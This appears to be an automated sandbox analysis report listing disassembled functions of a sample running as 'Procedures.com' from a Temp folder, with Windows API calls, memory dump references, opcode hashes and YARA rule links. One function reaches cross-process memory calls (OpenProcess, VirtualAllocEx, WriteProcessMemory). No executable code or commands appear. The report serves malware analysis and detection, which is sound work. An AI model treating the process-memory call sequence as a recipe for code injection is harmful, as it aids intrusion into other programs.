                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: da904f7c05845f7541ad922a84ae02595ab4d994c40670392bcc597fbed83fdc
                                                                                                                                                                                                                                                                                                    • Instruction ID: d533c2300f473a572654136fae9d2eb3c4ae4a2baef05c835ed743a4d9f8c8f8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da904f7c05845f7541ad922a84ae02595ab4d994c40670392bcc597fbed83fdc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F04F75104302AFDB211FAAAC49F973BADEF897A0F110514FA49E7250DA70DC058B60
                                                                                                                                                                                                                                                                                                    Function 00E90CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CCB
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CD8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CE5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CF2
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CFF
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90D0C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 70ff8d66ed887093345d3f34d9cfe66a6937f3b65623f75d8c5f6a637af0958c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b84cfd40adb3db948032822333cd99caa9ed6a7936386bb56f1e4ad9f2d961b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70ff8d66ed887093345d3f34d9cfe66a6937f3b65623f75d8c5f6a637af0958c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED01AE71800B15DFCB30AFA6D980816FBF9BF503193159A3ED19762931C7B0A988DF80
                                                                                                                                                                                                                                                                                                    Function 00E865AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00E865BF
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E865D6
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00E865EE
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00E8660A
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E86624
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 37a714d10ebb73ef7bc33f211390cef8a7ad53452fb807da027436c25582a627
                                                                                                                                                                                                                                                                                                    • Instruction ID: 09b4386a9176fd00595a2aa7c454f79b238986f5c990ddbcce018418fa090fd5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a714d10ebb73ef7bc33f211390cef8a7ad53452fb807da027436c25582a627
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F018630504304AFEB206F11DD4EF977BB8FB00705F001669A58B710E1FBF0AA488B50
                                                                                                                                                                                                                                                                                                    Function 00E5DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DAD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4), ref: 00E52D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: GetLastError.KERNEL32(00EF1DC4,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4,00EF1DC4), ref: 00E52D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DAE4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DAF6
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DB08
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DB1A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6236952b08006d9598fff1959ae1d3646bae30ea03a9b3c5977c398dcfe0257c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 002fe9abe5aca74e115e7053ef917faa5ad84a8af58349307f1f41c56795fa3a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6236952b08006d9598fff1959ae1d3646bae30ea03a9b3c5977c398dcfe0257c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F03C3250C208AFC674EB59ECC1C1A73EDAB143127956C09F809FB501CA30FC888754
                                                                                                                                                                                                                                                                                                    Function 00E52610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5262E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4), ref: 00E52D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: GetLastError.KERNEL32(00EF1DC4,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4,00EF1DC4), ref: 00E52D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52640
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52653
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52664
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52675
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a33f93276bec8e36ca149abe947e42743f703dcfaee59a7bcff710a412ba518e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 605295c194ddc2a023fdc6db346442d591536cc1b8e4c266012c51befde49beb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33f93276bec8e36ca149abe947e42743f703dcfaee59a7bcff710a412ba518e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43F030715065158F8601AF56EC4186837A4BF767527005D8EFA10B6374C731090DEFC8
                                                                                                                                                                                                                                                                                                    Function 00E512B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8454a9e3f693f9443c3405128c723d7040d88ae75dd5cbf16d7a960bcabfa20b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1e1b04911a3ba37b54de5c3cf2fab34e13eb5cee47c66a7d0dd4d81d39d4e1f8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8454a9e3f693f9443c3405128c723d7040d88ae75dd5cbf16d7a960bcabfa20b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFD12975900206DBCB249F68C8557FAB7B1FF05306F2869DAED02BB250D3759D88CB91
                                                                                                                                                                                                                                                                                                    Function 00EA5231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E941FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94229
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E941FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94239
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00EA5419
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA550E
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA55CD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                                                                                                                                    • String ID: bn
                                                                                                                                                                                                                                                                                                    • API String ID: 2854431205-2317007323
                                                                                                                                                                                                                                                                                                    • Opcode ID: 53af30183ce68579630476403c0664966c58d6d93d0e555282157c98d7b83c5d
                                                                                                                                                                                                                                                                                                    • Instruction ID: ee9fab79e869b354a220db622f5272761f7a8582874f3b84f70f940c37145fcc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53af30183ce68579630476403c0664966c58d6d93d0e555282157c98d7b83c5d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D12A71900249AFCB14DF94D891AEEBBB4FF48304F54516DE41ABB292DB31A98ACF50
                                                                                                                                                                                                                                                                                                    Function 00E2CF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E2D253
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: t5$t5$t5
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-3228143211
                                                                                                                                                                                                                                                                                                    • Opcode ID: b540b88cff5b019bb0e13a19d69b290ddf77cfc847baa62511470556aec052e7
                                                                                                                                                                                                                                                                                                    • Instruction ID: a016b8b55fb85ec863a4ae6322713438df6de36d666e1d7da6b519b20f5a516a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b540b88cff5b019bb0e13a19d69b290ddf77cfc847baa62511470556aec052e7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A915E75A04226CFCB14CF59E890AA9B7F2FF98314F24915ADA45B7350D731EA82CF90
                                                                                                                                                                                                                                                                                                    Function 00EA61A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CALLARGARRAY$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 157775604-1875210186
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ddc05502eb97a8a13f8e61fdcc7111ac6b50dc36662ee880abd48683abd2677
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f8e8b50d8309542e57f03d1c4a61d4efb8451c7457e5acc3b14a4dff4eb0d9b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ddc05502eb97a8a13f8e61fdcc7111ac6b50dc36662ee880abd48683abd2677
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89419071A00115DFCB04DFA8C885AEEBBF5FF5A314F146069E405BB261E770AD41CB60
                                                                                                                                                                                                                                                                                                    Function 00E83063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E82B1D,?,?,00000034,00000800,?,00000034), ref: 00E8BDF4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E830AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E82B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E8BDBF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E8BD1C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E8BD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E82AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E8BD42
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E8311A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E83167
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: d00a69644c9622502af596dad0f2aa85502ea99ebca5a8fad78d2d3755895304
                                                                                                                                                                                                                                                                                                    • Instruction ID: b2d2a3f4c5c842b1ceb16bd82c14a791a9254d1679862a8392a3480691571300
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d00a69644c9622502af596dad0f2aa85502ea99ebca5a8fad78d2d3755895304
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39413C72901218BEDB11EBA4CD85ADEBBB8EF45704F005095FA49B7190DA706F85CB60
                                                                                                                                                                                                                                                                                                    Function 00E51A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\139308\Procedures.com,00000104), ref: 00E51AD9
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E51BA4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E51BAE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                    • API String ID: 2506810119-2720841247
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6ef071f22b06f52ef2ff259472164e5d768a7945fceea95d451ccb9992eb9f32
                                                                                                                                                                                                                                                                                                    • Instruction ID: 82e760947990eaa13f4dc567b527c39208268a911841bd907bb37364950bce8e
